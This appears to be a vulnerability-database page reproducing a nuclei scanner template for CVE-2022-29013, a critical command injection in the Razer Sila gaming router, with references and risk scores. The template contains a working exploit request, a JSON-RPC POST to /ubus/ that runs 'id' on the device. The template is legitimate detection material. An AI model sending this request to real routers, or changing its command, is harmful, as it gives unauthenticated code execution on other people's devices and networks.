Lucene search
K

Razer Sila Gaming Router - Remote Code Execution

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

Razer Sila Gaming Router - Remote Code Execution via command injection vulnerability in v2.0.441_api-2.0.418 firmware

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-29013
9 Jun 202200:15
attackerkb
Circl
CVE-2022-29013
9 Jun 202207:33
circl
CNNVD
Razer Sila Gaming Router 操作系统命令注入漏洞
8 Jun 202200:00
cnnvd
Check Point Advisories
Razer Sila Gaming Router Command Injection (CVE-2022-29013)
21 Nov 202200:00
checkpoint_advisories
CVE
CVE-2022-29013
8 Jun 202223:28
cve
Cvelist
CVE-2022-29013
8 Jun 202223:28
cvelist
NVD
CVE-2022-29013
9 Jun 202200:15
nvd
Prion
Command injection
9 Jun 202200:15
prion
Positive Technologies
PT-2022-19365 · Razer · Razer Sila Gaming Router
8 Jun 202200:00
ptsecurity
RedhatCVE
CVE-2022-29013
22 May 202522:44
redhatcve
Rows per page
id: CVE-2022-29013

info:
  name: Razer Sila Gaming Router - Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands on the Razer Sila gaming router through command injection in the ubus endpoint, potentially compromising the entire home network and intercepting all network traffic.
  remediation: |
    Upgrade to a patched version of Razer Sila firmware that properly sanitizes command parameters and validates input to the ubus API.
  reference:
    - https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29013
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29013
    cwe-id: CWE-78
    epss-score: 0.77136
    epss-percentile: 0.99492
    cpe: cpe:2.3:h:razer:sila:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: razer
    product: sila
  tags: packetstorm,cve,cve2022,razer,sila,router,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/ubus/"
    headers:
      Origin: "{{RootURL}}"
      Referer: "{{ROotURL}}"
      X-Requested-With: XMLHttpRequest
    body: |
      {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022074afe84a0b7dc359c85d479bdcd0a0d47145810790fa65f5ec0f825bcca0f980022100b8777a904766054f532f6da92565b69b21be46696d565420b803201578637ac3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 27.5
CVSS 3.19.8
EPSS0.77136
38